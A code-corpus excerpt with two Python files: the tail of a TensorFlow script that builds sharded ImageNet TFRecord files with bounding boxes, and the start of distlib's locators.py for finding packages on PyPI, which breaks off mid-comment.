human: string, human-readable label, e.g., 'red fox, Vulpes vulpes'
bbox: list of bounding boxes; each box is a list of integers
specifying [xmin, ymin, xmax, ymax]. All boxes are assumed to belong to
the same label as the image label.
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
xmin = []
ymin = []
xmax = []
ymax = []
for b in bbox:
assert len(b) == 4
# pylint: disable=expression-not-assigned
[l.append(point) for l, point in zip([xmin, ymin, xmax, ymax], b)]
# pylint: enable=expression-not-assigned
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/synset': _bytes_feature(synset),
'image/class/text': _bytes_feature(human),
'image/object/bbox/xmin': _float_feature(xmin),
'image/object/bbox/xmax': _float_feature(xmax),
'image/object/bbox/ymin': _float_feature(ymin),
'image/object/bbox/ymax': _float_feature(ymax),
'image/object/bbox/label': _int64_feature([label] * len(xmin)),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(os.path.basename(filename)),
'image/encoded': _bytes_feature(image_buffer)}))
return example
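# Illustrative only (not part of the original pipeline and never called by it):
# a minimal sketch of how a record written by _convert_to_example() could be
# parsed back, using the same TF 1.x API this script already relies on. The
# helper name and its 'serialized' argument (one serialized Example string read
# from a TFRecord file) are assumptions for the sake of the example.
def _parse_example_sketch(serialized):
  """Parse a serialized Example produced by this script (illustrative sketch)."""
  feature_map = {
      'image/encoded': tf.FixedLenFeature([], dtype=tf.string),
      'image/height': tf.FixedLenFeature([], dtype=tf.int64),
      'image/width': tf.FixedLenFeature([], dtype=tf.int64),
      'image/class/label': tf.FixedLenFeature([], dtype=tf.int64),
      'image/class/text': tf.FixedLenFeature([], dtype=tf.string,
                                             default_value=''),
      'image/object/bbox/xmin': tf.VarLenFeature(dtype=tf.float32),
      'image/object/bbox/ymin': tf.VarLenFeature(dtype=tf.float32),
      'image/object/bbox/xmax': tf.VarLenFeature(dtype=tf.float32),
      'image/object/bbox/ymax': tf.VarLenFeature(dtype=tf.float32),
  }
  features = tf.parse_single_example(serialized, feature_map)
  # Decode the JPEG bytes back into a uint8 tensor of shape (height, width, 3).
  image = tf.image.decode_jpeg(features['image/encoded'], channels=3)
  return image, features['image/class/label']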
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that converts CMYK JPEG data to RGB JPEG data.
self._cmyk_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_jpeg(self._cmyk_data, channels=0)
self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def cmyk_to_rgb(self, image_data):
return self._sess.run(self._cmyk_to_rgb,
feed_dict={self._cmyk_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
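# Illustrative usage of ImageCoder (the file path below is hypothetical):
#   coder = ImageCoder()
#   with tf.gfile.FastGFile('/tmp/n01440764_10026.JPEG', 'rb') as f:
#     image = coder.decode_jpeg(f.read())  # numpy uint8 array of shape (H, W, 3)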
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
# File list from:
# https://groups.google.com/forum/embed/?place=forum/torch7#!topic/torch7/fOSTXHIESSU
return 'n02105855_2933.JPEG' in filename
def _is_cmyk(filename):
"""Determine if file contains a CMYK JPEG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a JPEG encoded with CMYK color space.
"""
# File list from:
# https://github.com/cytsai/ilsvrc-cmyk-image-list
blacklist = ['n01739381_1309.JPEG', 'n02077923_14822.JPEG',
'n02447366_23489.JPEG', 'n02492035_15739.JPEG',
'n02747177_10752.JPEG', 'n03018349_4028.JPEG',
'n03062245_4620.JPEG', 'n03347037_9675.JPEG',
'n03467068_12171.JPEG', 'n03529860_11437.JPEG',
'n03544143_17228.JPEG', 'n03633091_5218.JPEG',
'n03710637_5125.JPEG', 'n03961711_5286.JPEG',
'n04033995_2932.JPEG', 'n04258138_17003.JPEG',
'n04264628_27969.JPEG', 'n04336792_7448.JPEG',
'n04371774_5854.JPEG', 'n04596742_4225.JPEG',
'n07583066_647.JPEG', 'n13037406_4650.JPEG']
return filename.split('/')[-1] in blacklist
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
image_data = tf.gfile.FastGFile(filename, 'rb').read()
# Clean the dirty data.
if _is_png(filename):
# 1 image is a PNG.
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
elif _is_cmyk(filename):
# 22 JPEG images are in CMYK colorspace.
print('Converting CMYK to RGB for %s' % filename)
image_data = coder.cmyk_to_rgb(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch index to run, within [0, len(ranges)).
ranges: list of pairs of integers specifying the ranges of each batch to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in xrange(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
synset = synsets[i]
human = humans[i]
bbox = bboxes[i]
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(filename, image_buffer, label,
synset, human, bbox,
height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_shards_per_batch))
sys.stdout.flush()
def _process_image_files(name, filenames, synsets, labels, humans,
bboxes, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(synsets)
assert len(filenames) == len(labels)
assert len(filenames) == len(humans)
assert len(filenames) == len(bboxes)
# Break all images into batches given by the half-open ranges [ranges[i][0], ranges[i][1]).
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in xrange(len(spacing) - 1):
ranges.append([spacing[i], spacing[i+1]])
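  # For example, np.linspace(0, 100, 5) gives [0, 25, 50, 75, 100], so four
  # threads would receive the half-open ranges [0, 25), [25, 50), [50, 75)
  # and [75, 100).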
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in xrange(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the ImageNet data set resides in JPEG files located in
the following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
where 'n01440764' is the unique synset label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
n01440764
n01443537
n01484850
where each line corresponds to a label expressed as a synset. We map
each synset contained in the file to an integer (based on the alphabetical
ordering) starting with the integer 1 corresponding to the synset
contained in the first line.
The reason we start the integer labels at 1 is to reserve label 0 as an
unused background class.
Returns:
filenames: list of strings; each string is a path to an image file.
synsets: list of strings; each string is a unique WordNet ID.
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
challenge_synsets = [l.strip() for l in
tf.gfile.FastGFile(labels_file, 'r').readlines()]
labels = []
filenames = []
synsets = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for synset in challenge_synsets:
jpeg_file_path = '%s/%s/*.JPEG' % (data_dir, synset)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
synsets.extend([synset] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(challenge_synsets)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = range(len(filenames))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
synsets = [synsets[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(challenge_synsets), data_dir))
return filenames, synsets, labels
def _find_human_readable_labels(synsets, synset_to_human):
"""Build a list of human-readable labels.
Args:
synsets: list of strings; each string is a unique WordNet ID.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
Returns:
List of human-readable strings corresponding to each synset.
"""
humans = []
for s in synsets:
assert s in synset_to_human, ('Failed to find: %s' % s)
humans.append(synset_to_human[s])
return humans
def _find_image_bounding_boxes(filenames, image_to_bboxes):
"""Find the bounding boxes for a given image file.
Args:
filenames: list of strings; each string is a path to an image file.
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
Returns:
List of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
"""
num_image_bbox = 0
bboxes = []
for f in filenames:
basename = os.path.basename(f)
if basename in image_to_bboxes:
bboxes.append(image_to_bboxes[basename])
num_image_bbox += 1
else:
bboxes.append([])
print('Found %d images with bboxes out of %d images' % (
num_image_bbox, len(filenames)))
return bboxes
def _process_dataset(name, directory, num_shards, synset_to_human,
image_to_bboxes):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
"""
filenames, synsets, labels = _find_image_files(directory, FLAGS.labels_file)
humans = _find_human_readable_labels(synsets, synset_to_human)
bboxes = _find_image_bounding_boxes(filenames, image_to_bboxes)
_process_image_files(name, filenames, synsets, labels,
humans, bboxes, num_shards)
def _build_synset_lookup(imagenet_metadata_file):
"""Build lookup for synset to human-readable label.
Args:
imagenet_metadata_file: string, path to file containing mapping from
synset to human-readable label.
Assumes each line of the file looks like:
n02119247 black fox
n02119359 silver fox
n02119477 red fox, Vulpes fulva
where each line corresponds to a unique mapping. Note that each line is
formatted as <synset>\t<human readable label>.
Returns:
Dictionary of synset to human labels, such as:
'n02119022' --> 'red fox, Vulpes vulpes'
"""
lines = tf.gfile.FastGFile(imagenet_metadata_file, 'r').readlines()
synset_to_human = {}
for l in lines:
if l:
parts = l.strip().split('\t')
assert len(parts) == 2
synset = parts[0]
human = parts[1]
synset_to_human[synset] = human
return synset_to_human
def _build_bounding_box_lookup(bounding_box_file):
"""Build a lookup from image file to bounding boxes.
Args:
bounding_box_file: string, path to file with bounding boxes annotations.
Assumes each line of the file looks like:
n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
where each line corresponds to one bounding box annotation associated
with an image. Each line can be parsed as:
<JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
Note that there might exist multiple bounding box annotations associated
with an image file. This file is the output of process_bounding_boxes.py.
Returns:
Dictionary mapping image file names to a list of bounding boxes. This list
contains 0+ bounding boxes.
"""
lines = tf.gfile.FastGFile(bounding_box_file, 'r').readlines()
images_to_bboxes = {}
num_bbox = 0
num_image = 0
for l in lines:
if l:
parts = l.split(',')
assert len(parts) == 5, ('Failed to parse: %s' % l)
filename = parts[0]
xmin = float(parts[1])
ymin = float(parts[2])
xmax = float(parts[3])
ymax = float(parts[4])
box = [xmin, ymin, xmax, ymax]
if filename not in images_to_bboxes:
images_to_bboxes[filename] = []
num_image += 1
images_to_bboxes[filename].append(box)
num_bbox += 1
print('Successfully read %d bounding boxes '
'across %d images.' % (num_bbox, num_image))
return images_to_bboxes
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Build a map from synset to human-readable label.
synset_to_human = _build_synset_lookup(FLAGS.imagenet_metadata_file)
image_to_bboxes = _build_bounding_box_lookup(FLAGS.bounding_box_file)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, synset_to_human, image_to_bboxes)
_process_dataset('train', FLAGS.train_directory, FLAGS.train_shards,
synset_to_human, image_to_bboxes)
if __name__ == '__main__':
tf.app.run()
|
locators.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2015 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import gzip
from io import BytesIO
import json
import logging
import os
import posixpath
import re
try:
import threading
except ImportError: # pragma: no cover
import dummy_threading as threading
import zlib
from . import DistlibException
from .compat import (
urljoin,
urlparse,
urlunparse,
url2pathname,
pathname2url,
queue,
quote,
unescape,
string_types,
build_opener,
HTTPRedirectHandler as BaseRedirectHandler,
text_type,
Request,
HTTPError,
URLError,
)
from .database import Distribution, DistributionPath, make_dist
from .metadata import Metadata, MetadataInvalidError
from .util import (
cached_property,
parse_credentials,
ensure_slash,
split_filename,
get_project_data,
parse_requirement,
parse_name_and_version,
ServerProxy,
normalize_name,
)
from .version import get_scheme, UnsupportedVersionError
from .wheel import Wheel, is_compatible
logger = logging.getLogger(__name__)
HASHER_HASH = re.compile(r"^(\w+)=([a-f0-9]+)")
CHARSET = re.compile(r";\s*charset\s*=\s*(.*)\s*$", re.I)
HTML_CONTENT_TYPE = re.compile("text/html|application/x(ht)?ml")
DEFAULT_INDEX = "https://pypi.org/pypi"
def get_all_distribution_names(url=None):
"""
Return all distribution names known by an index.
:param url: The URL of the index.
:return: A list of all known distribution names.
"""
if url is None:
url = DEFAULT_INDEX
client = ServerProxy(url, timeout=3.0)
try:
return client.list_packages()
finally:
client("close")()
class RedirectHandler(BaseRedirectHandler):
"""
A class to work around a bug in some Python 3.2.x releases.
"""
# There's a bug in the base version for some 3.2.x
# (e.g. 3.2.2 on Ubuntu Oneiric). If a Location header
# returns e.g. /abc, it bails because it says the scheme ''
# is bogus, when actually it should use the request's
# URL for the scheme. See Python issue #13696.
def http_error_302(self, req, fp, code, msg, headers):
# Some servers (incorrectly) return multiple Location headers
# (so probably same goes for URI). Use first header.
newurl = None
for key in ("location", "uri"):
if key in headers:
newurl = headers[key]
break
if newurl is None: # pragma: no cover
return
urlparts = urlparse(newurl)
if urlparts.scheme == "":
newurl = urljoin(req.get_full_url(), newurl)
if hasattr(headers, "replace_header"):
headers.replace_header(key, newurl)
else:
headers[key] = newurl
return BaseRedirectHandler.http_error_302(self, req, fp, code, msg, headers)
http_error_301 = http_error_303 = http_error_307 = http_error_302
class Locator(object):
"""
A base class for locators - things that locate distributions.
"""
source_extensions = (".tar.gz", ".tar.bz2", ".tar", ".zip", ".tgz", ".tbz")
binary_extensions = (".egg", ".exe", ".whl")
excluded_extensions = (".pdf",)
# A list of tags indicating which wheels you want to match. The default
# value of None matches against the tags compatible with the running
# Python. If you want to match other values, set wheel_tags on a locator
# instance to a list of tuples (pyver, abi, arch) which you want to match.
wheel_tags = None
downloadable_extensions = source_extensions + (".whl",)
def __init__(self, scheme="default"):
"""
Initialise an instance.
:param scheme: Because locators look for most recent versions, they
need to know the version scheme to use. This specifies
the current PEP-recommended scheme - use ``'legacy'``
if you need to support existing distributions on PyPI.
"""
self._cache = {}
self.scheme = scheme
# Because of bugs in some of the handlers on some of the platforms,
# we use our own opener rather than just using urlopen.
self.opener = build_opener(RedirectHandler())
# If get_project() is called from locate(), the matcher instance
# is set from the requirement passed to locate(). See issue #18 for
# why this can be useful to know.
self.matcher = None
self.errors = queue.Queue()
def get_errors(self):
"""
Return any errors which have occurred.
"""
result = []
while not self.errors.empty(): # pragma: no cover
try:
e = self.errors.get(False)
result.append(e)
except queue.Empty:
continue
self.errors.task_done()
return result
def clear_errors(self):
"""
Clear any errors which may have been logged.
"""
# Just get the errors and throw them away
self.get_errors()
def clear_cache(self):
self._cache.clear()
def _get_scheme(self):
return self._scheme
def _set_scheme(self, value):
self._scheme = value
scheme = property(_get_scheme, _set_scheme)
def _get_project(self, name):
"""
For a given project, get a dictionary mapping available versions to Distribution
instances.
This should be implemented in subclasses.
If called from a locate() request, self.matcher will be set to a
matcher for the requirement to satisfy, otherwise it will be None.
"""
raise NotImplementedError("Please implement in the subclass")
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError("Please implement in the subclass")
def get_project(self, name):
"""
For a given project, get a dictionary mapping available versions to Distribution
instances.
This calls _get_project to do all the work, and just implements a caching layer on top.
"""
if self._cache is None: # pragma: no cover
result = self._get_project(name)
elif name in self._cache:
result = self._cache[name]
else:
self.clear_errors()
result = self._get_project(name)
self._cache[name] = result
return result
def score_url(self, url):
"""
Give an url a score which can be used to choose preferred URLs
for a given project release.
"""
t = urlparse(url)
basename = posixpath.basename(t.path)
compatible = True
is_wheel = basename.endswith(".whl")
is_downloadable = basename.endswith(self.downloadable_extensions)
if is_wheel:
compatible = is_compatible(Wheel(basename), self.wheel_tags)
return (
t.scheme == "https",
"pypi.org" in t.netloc,
is_downloadable,
is_wheel,
compatible,
basename,
)
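    # Illustrative ordering of the tuples returned above: Python compares them
    # element by element, so an https:// wheel hosted on pypi.org, e.g.
    #   (True, True, True, True, True, 'foo-1.0-py2.py3-none-any.whl'),
    # sorts above an http:// sdist from another host, e.g.
    #   (False, False, True, False, True, 'foo-1.0.tar.gz'),
    # which is what prefer_url() below relies on.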
def prefer_url(self, url1, url2):
"""
Choose one of two URLs where both are candidates for distribution
archives for the same version of a distribution (for example,
.tar.gz vs. zip).
The current implementation favours https:// URLs over http://, archives
from PyPI over those from other locations, wheel compatibility (if a
wheel) and then the archive name.
"""
result = url2
if url1:
s1 = self.score_url(url1)
s2 = self.score_url(url2)
if s1 > s2:
result = url1
if result != url2:
logger.debug("Not replacing %r with %r", url1, url2)
else:
logger.debug("Replacing %r with %r", url1, url2)
return result
def split_filename(self, filename, project_name):
"""
Attempt to split a filename into project name, version and Python version.
"""
return split_filename(filename, project_name)
def convert_url_to_download_info(self, url, project_name):
"""
See if a URL is a candidate for a download URL for a project (the URL
has typically been scraped from an HTML page).
If it is, a dictionary is returned with keys "name", "version",
"filename" and "url"; otherwise, None is returned.
"""
def same_project(name1, name2):
return normalize_name(name1) == normalize_name(name2)
result = None
scheme, netloc, path, params, query, frag = urlparse(url)
if frag.lower().startswith("egg="): # pragma: no cover
logger.debug("%s: version hint in fragment: %r", project_name, frag)
m = HASHER_HASH.match(frag)
if m:
algo, digest = m.groups()
else:
algo, digest = None, None
origpath = path
if path and path[-1] == "/": # pragma: no cover
path = path[:-1]
if path.endswith(".whl"):
try:
wheel = Wheel(path)
if not is_compatible(wheel, self.wheel_tags):
logger.debug("Wheel not compatible: %s", path)
else:
if project_name is None:
include = True
else:
include = same_project(wheel.name, project_name)
if include:
result = {
"name": wheel.name,
"version": wheel.version,
"filename": wheel.filename,
"url": urlunparse(
(scheme, netloc, origpath, params, query, "")
),
"python-version": ", ".join(
[".".join(list(v[2:])) for v in wheel.pyver]
),
}
except Exception as e: # pragma: no cover
logger.warning("invalid path for wheel: %s", path)
elif not path.endswith(self.downloadable_extensions): # pragma: no cover
logger.debug("Not downloadable: %s", path)
else: # downloadable extension
path = filename = posixpath.basename(path)
for ext in self.downloadable_extensions:
if path.endswith(ext):
path = path[: -len(ext)]
t = self.split_filename(path, project_name)
if not t: # pragma: no cover
logger.debug("No match for project/version: %s", path)
else:
name, version, pyver = t
if not project_name or same_project(project_name, name):
result = {
"name": name,
"version": version,
"filename": filename,
"url": urlunparse(
(scheme, netloc, origpath, params, query, "")
),
#'packagetype': 'sdist',
}
if pyver: # pragma: no cover
result["python-version"] = pyver
break
if result and algo:
result["%s_digest" % algo] = digest
return result
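    # Illustrative result of the method above for a hypothetical URL (the host,
    # file name and hash are made up):
    #   convert_url_to_download_info(
    #       'https://example.org/packages/foo-1.0.tar.gz#sha256=abc123', 'foo')
    #   -> {'name': 'foo', 'version': '1.0', 'filename': 'foo-1.0.tar.gz',
    #       'url': 'https://example.org/packages/foo-1.0.tar.gz',
    #       'sha256_digest': 'abc123'}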
def _get_digest(self, info):
"""
Get a digest from a dictionary by looking at a "digests" dictionary
or keys of the form 'algo_digest'.
Returns a 2-tuple (algo, digest) if found, else None. Currently
looks only for SHA256, then MD5.
"""
result = None
if "digests" in info:
digests = info["digests"]
for algo in ("sha256", "md5"):
if algo in digests:
result = (algo, digests[algo])
break
if not result:
for algo in ("sha256", "md5"):
key = "%s_digest" % algo
if key in info:
result = (algo, info[key])
break
return result
def _update_version_data(self, result, info):
"""
Update a result dictionary (the final result from _get_project) with a
dictionary for a specific version, which typically holds information
gleaned from a filename or URL for an archive for the distribution.
"""
name = info.pop("name")
version = info.pop("version")
if version in result:
dist = result[version]
md = dist.metadata
else:
dist = make_dist(name, version, scheme=self.scheme)
md = dist.metadata
dist.digest = digest = self._get_digest(info)
url = info["url"]
result["digests"][url] = digest
if md.source_url != info["url"]:
md.source_url = self.prefer_url(md.source_url, url)
result["urls"].setdefault(version, set()).add(url)
dist.locator = self
result[version] = dist
def locate(self, requirement, prereleases=False):
"""
Find the most recent distribution which matches the given
requirement.
:param requirement: A requirement of the form 'foo (1.0)' or perhaps
'foo (>= 1.0, < 2.0, != 1.3)'
:param prereleases: If ``True``, allow pre-release versions
to be located. Otherwise, pre-release versions
are not returned.
:return: A :class:`Distribution` instance, or ``None`` if no such
distribution could be located.
"""
result = None
r = parse_requirement(requirement)
if r is None: # pragma: no cover
raise DistlibException("Not a valid requirement: %r" % requirement)
scheme = get_scheme(self.scheme)
self.matcher = matcher = scheme.matcher(r.requirement)
logger.debug("matcher: %s (%s)", matcher, type(matcher).__name__)
versions = self.get_project(r.name)
if len(versions) > 2: # urls and digests keys are present
# sometimes, versions are invalid
slist = []
vcls = matcher.version_class
for k in versions:
if k in ("urls", "digests"):
continue
try:
if not matcher.match(k):
logger.debug("%s did not match %r", matcher, k)
else:
if prereleases or not vcls(k).is_prerelease:
slist.append(k)
else:
logger.debug(
"skipping pre-release " "version %s of %s",
k,
matcher.name,
)
except Exception: # pragma: no cover
logger.warning("error matching %s with %r", matcher, k)
pass # slist.append(k)
if len(slist) > 1:
slist = sorted(slist, key=scheme.key)
if slist:
logger.debug("sorted list: %s", slist)
version = slist[-1]
result = versions[version]
if result:
if r.extras:
result.extras = r.extras
result.download_urls = versions.get("urls", {}).get(version, set())
d = {}
sd = versions.get("digests", {})
for url in result.download_urls:
if url in sd: # pragma: no cover
d[url] = sd[url]
result.digests = d
self.matcher = None
return result
class PyPIRPCLocator(Locator):
"""
This locator uses XML-RPC to locate distributions. It therefore
cannot be used with simple mirrors (that only mirror file content).
"""
def __init__(self, url, **kwargs):
"""
Initialise an instance.
:param url: The URL to use for XML-RPC.
:param kwargs: Passed to the superclass constructor.
"""
super(PyPIRPCLocator, self).__init__(**kwargs)
self.base_url = url
self.client = ServerProxy(url, timeout=3.0)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
return set(self.client.list_packages())
def _get_project(self, name):
result = {"urls": {}, "digests": {}}
versions = self.client.package_releases(name, True)
for v in versions:
urls = self.client.release_urls(name, v)
data = self.client.release_data(name, v)
metadata = Metadata(scheme=self.scheme)
metadata.name = data["name"]
metadata.version = data["version"]
metadata.license = data.get("license")
metadata.keywords = data.get("keywords", [])
metadata.summary = data.get("summary")
dist = Distribution(metadata)
if urls:
info = urls[0]
metadata.source_url = info["url"]
dist.digest = self._get_digest(info)
dist.locator = self
result[v] = dist
for info in urls:
url = info["url"]
digest = self._get_digest(info)
result["urls"].setdefault(v, set()).add(url)
result["digests"][url] = digest
return result
class PyPIJSONLocator(Locator):
"""
This locator uses PyPI's JSON interface. It's very limited in functionality
and probably not worth using.
"""
def __init__(self, url, **kwargs):
super(PyPIJSONLocator, self).__init__(**kwargs)
self.base_url = ensure_slash(url)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError("Not available from this locator")
def _get_project(self, name):
result = {"urls": {}, "digests": {}}
url = urljoin(self.base_url, "%s/json" % quote(name))
try:
resp = self.opener.open(url)
data = resp.read().decode() # for now
d = json.loads(data)
md = Metadata(scheme=self.scheme)
data = d["info"]
md.name = data["name"]
md.version = data["version"]
md.license = data.get("license")
md.keywords = data.get("keywords", [])
md.summary = data.get("summary")
dist = Distribution(md)
dist.locator = self
urls = d["urls"]
result[md.version] = dist
for info in d["urls"]:
url = info["url"]
dist.download_urls.add(url)
dist.digests[url] = self._get_digest(info)
result["urls"].setdefault(md.version, set()).add(url)
result["digests"][url] = self._get_digest(info)
# Now get other releases
for version, infos in d["releases"].items():
if version == md.version:
continue # already done
omd = Metadata(scheme=self.scheme)
omd.name = md.name
omd.version = version
odist = Distribution(omd)
odist.locator = self
result[version] = odist
for info in infos:
url = info["url"]
odist.download_urls.add(url)
odist.digests[url] = self._get_digest(info)
result["urls"].setdefault(version, set()).add(url)
result["digests"][url] = self._get_digest(info)
# for info in urls:
# md.source_url = info['url']
# dist.digest = self._get_digest(info)
# dist.locator = self
# for info in urls:
# url = info['url']
# result['urls'].setdefault(md.version, set()).add(url)
# result['digests'][url] = self._get_digest(info)
except Exception as e:
self.errors.put(text_type(e))
logger.exception("JSON fetch failed: %s", e)
return result
class Page(object):
"""
This class represents a scraped HTML page.
"""
# The following slightly hairy-looking regex just looks for the contents of
# an anchor link, which has an attribute "href" either immediately preceded
# or immediately followed by a "rel" attribute. The attribute values can be
# declared with double quotes, single quotes or no quotes - which leads to
# the length of the expression.
_href = re.compile(
"""
(rel\\s*=\\s*(?:"(?P<rel1>[^"]*)"|'(?P<rel2>[^']*)'|(?P<rel3>[^>\\s\n]*))\\s+)?
href\\s*=\\s*(?:"(?P<url1>[^"]*)"|'(?P<url2>[^']*)'|(?P<url3>[^>\\s\n]*))
(\\s+rel\\s*=\\s*(?:"(?P<rel4>[^"]*)"|'(?P<rel5>[^']*)'|(?P<rel6>[^>\\s\n]*)))?
""",
re.I | re.S | re.X,
)
_base = re.compile(r"""<base\s+href\s*=\s*['"]?([^'">]+)""", re.I | re.S)
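    # For example, both of these anchors would be matched by _href above
    # (attribute order and quoting style may vary):
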